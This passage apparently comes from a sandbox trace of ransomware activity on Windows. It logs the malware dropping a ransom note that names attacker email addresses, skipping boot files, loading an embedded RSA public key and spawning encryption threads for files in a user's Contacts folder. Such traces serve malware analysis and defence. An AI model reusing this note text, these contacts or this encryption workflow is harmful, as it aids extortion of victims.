HALPmcxz\\Application Data", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*" [0034.137] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="Desktop") returned 0x0 [0034.137] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="DESKTOP") returned 0x0 [0034.137] SetErrorMode (uMode=0x1) returned 0x1 [0034.137] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\_HELP_INSTRUCTION.TXT") returned 68 [0034.137] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0034.138] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0034.138] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x3d4) returned 0x0 [0034.138] RegQueryValueExW (in: hKey=0x3d4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3e10c08, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3e10c08*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0034.138] RegCloseKey (hKey=0x3d4) returned 0x0 [0034.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0034.138] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0034.138] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0034.138] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0034.140] WriteFile (in: hFile=0x3d4, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0034.141] CloseHandle (hObject=0x3d4) returned 1 [0034.141] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0034.141] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0034.142] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0034.142] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0034.142] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0034.142] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0034.142] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0034.142] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Contacts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0034.142] SetErrorMode (uMode=0x1) returned 0x1 [0034.142] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0034.142] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0034.142] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0034.142] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0034.142] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x324878 [0034.142] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="Contacts" [0034.142] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0034.142] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0034.142] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0034.142] lstrcmpW (lpString1="Aclviho ASldjfl.contact", lpString2="..") returned 1 [0034.142] lstrcmpW (lpString1="Aclviho ASldjfl.contact", lpString2=".") returned 1 [0034.142] StrStrW (lpFirst="Aclviho ASldjfl.contact", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0034.142] StrStrW (lpFirst="Aclviho ASldjfl.contact", lpSrch="ntldr") returned 0x0 [0034.142] StrStrW (lpFirst="Aclviho ASldjfl.contact", lpSrch="NTLDR") returned 0x0 [0034.142] StrStrW (lpFirst="Aclviho ASldjfl.contact", lpSrch="NTDETECT.COM") returned 0x0 [0034.142] StrStrW (lpFirst="Aclviho ASldjfl.contact", lpSrch="ntdetect.com") returned 0x0 [0034.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0034.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0034.142] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0034.142] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0034.142] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Aclviho ASldjfl.contact" | out: lpString1="Aclviho ASldjfl.contact") returned="Aclviho ASldjfl.contact" [0034.142] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0034.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3c8 [0034.143] Sleep (dwMilliseconds=0x96) [0034.318] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0034.319] lstrcmpW (lpString1="Administrator.contact", lpString2="..") returned 1 [0034.319] lstrcmpW (lpString1="Administrator.contact", lpString2=".") returned 1 [0034.319] StrStrW (lpFirst="Administrator.contact", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0034.319] StrStrW (lpFirst="Administrator.contact", lpSrch="ntldr") returned 0x0 [0034.319] StrStrW (lpFirst="Administrator.contact", lpSrch="NTLDR") returned 0x0 [0034.319] StrStrW (lpFirst="Administrator.contact", lpSrch="NTDETECT.COM") returned 0x0 [0034.319] StrStrW (lpFirst="Administrator.contact", lpSrch="ntdetect.com") returned 0x0 [0034.319] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0034.319] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0034.319] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0034.319] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0034.319] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Administrator.contact" | out: lpString1="Administrator.contact") returned="Administrator.contact" [0034.319] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0034.319] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3b0 [0034.319] Sleep (dwMilliseconds=0x96) [0034.488] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0034.488] lstrcmpW (lpString1="asdlfk poopvy.contact", lpString2="..") returned 1 [0034.488] lstrcmpW (lpString1="asdlfk poopvy.contact", lpString2=".") returned 1 [0034.488] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0034.488] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="ntldr") returned 0x0 [0034.488] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="NTLDR") returned 0x0 [0034.488] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="NTDETECT.COM") returned 0x0 [0034.488] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="ntdetect.com") returned 0x0 [0034.488] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0034.488] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0034.488] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0034.488] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0034.488] lstrcpyW (in: lpString1=0x17cf1c, lpString2="asdlfk poopvy.contact" | out: lpString1="asdlfk poopvy.contact") returned="asdlfk poopvy.contact" [0034.488] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0034.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3dc [0034.489] Sleep (dwMilliseconds=0x96) [0034.710] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0034.710] lstrcmpW (lpString1="chucu jadnvk.contact", lpString2="..") returned 1 [0034.710] lstrcmpW (lpString1="chucu jadnvk.contact", lpString2=".") returned 1 [0034.710] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0034.710] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="ntldr") returned 0x0 [0034.710] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="NTLDR") returned 0x0 [0034.710] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="NTDETECT.COM") returned 0x0 [0034.710] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="ntdetect.com") returned 0x0 [0034.710] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0034.710] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0034.710] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0034.710] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0034.710] lstrcpyW (in: lpString1=0x17cf1c, lpString2="chucu jadnvk.contact" | out: lpString1="chucu jadnvk.contact") returned="chucu jadnvk.contact" [0034.710] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0034.710] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3ec [0034.710] Sleep (dwMilliseconds=0x96) [0034.878] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0034.878] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0034.878] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0034.878] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0034.878] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0034.878] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0034.878] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0034.878] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0034.878] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0034.878] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0034.878] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0034.878] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0034.878] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0034.878] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0034.878] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3b4 [0034.879] Sleep (dwMilliseconds=0x96) [0035.033] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.033] lstrcmpW (lpString1="lulcit amkdfe.contact", lpString2="..") returned 1 [0035.033] lstrcmpW (lpString1="lulcit amkdfe.contact", lpString2=".") returned 1 [0035.034] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.034] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="ntldr") returned 0x0 [0035.034] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="NTLDR") returned 0x0 [0035.034] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="NTDETECT.COM") returned 0x0 [0035.034] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="ntdetect.com") returned 0x0 [0035.034] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0035.034] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0035.034] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0035.034] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0035.034] lstrcpyW (in: lpString1=0x17cf1c, lpString2="lulcit amkdfe.contact" | out: lpString1="lulcit amkdfe.contact") returned="lulcit amkdfe.contact" [0035.034] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0035.034] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e8 [0035.034] Sleep (dwMilliseconds=0x96) [0035.205] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.205] lstrcmpW (lpString1="sikvnb huvuib.contact", lpString2="..") returned 1 [0035.205] lstrcmpW (lpString1="sikvnb huvuib.contact", lpString2=".") returned 1 [0035.205] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.205] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="ntldr") returned 0x0 [0035.205] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="NTLDR") returned 0x0 [0035.205] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="NTDETECT.COM") returned 0x0 [0035.205] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="ntdetect.com") returned 0x0 [0035.205] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 